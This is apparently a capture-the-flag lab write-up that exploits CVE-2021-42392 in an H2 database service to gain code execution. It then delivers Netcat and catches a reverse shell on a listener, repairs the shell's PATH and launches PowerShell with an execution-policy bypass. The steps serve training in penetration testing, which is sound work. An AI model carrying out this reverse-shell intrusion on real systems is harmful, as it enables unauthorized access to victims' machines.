JNI Code Execution


The target H2 instance was identified as vulnerable to CVE-2021-42392.

Creating a native library at C:\Windows\Temp\JNIScriptEngine.dll

Loading the newly created native library through the JNI script engine

Code execution confirmed

Exploitation


Delivering the Netcat binary. The backslashes in the directory path needed to be escaped (\\).

Spawning a reverse shell with the Netcat binary

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/jacko]
└─$ nnc 445
listening on [any] 445 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.236.66] 50301
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
 
C:\Program Files (x86)\H2\service> whoami
 whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.
 
C:\Program Files (x86)\H2\service>hostname
hostname
'hostname' is not recognized as an internal or external command,
operable program or batch file.
 
C:\Program Files (x86)\H2\service>ipconfig
ipconfig
'ipconfig' is not recognized as an internal or external command,
operable program or batch file.

Got the callback, but commands do not work. This is likely due to a missing or incomplete PATH variable.

Environment Fix


C:\Program Files (x86)\H2\service> echo %PATH%
C:\Users\tony\AppData\Local\Microsoft\WindowsApps;

The PATH variable of the shell environment contains only the WindowsApps directory, which is why standard commands such as whoami, hostname and ipconfig cannot be resolved. The likely cause is that the H2 service runs under the tony account without the usual system environment: either the necessary environment variables and system paths were never set up for that account, or the service itself is not configured to run under tony with a proper environment.

C:\Program Files (x86)\H2\service> set PATH=%PATH%;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;

Extending the %PATH% variable manually with the standard system directories

C:\Program Files (x86)\H2\service> powershell -ep bypass
 powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS C:\Program Files (x86)\H2\service> whoami
whoami
jacko\tony
PS C:\Program Files (x86)\H2\service> hostname
hostname
jacko
PS C:\Program Files (x86)\H2\service> ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.236.66
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.236.254

Initial foothold established on the target system as the tony user by exploiting CVE-2021-42392.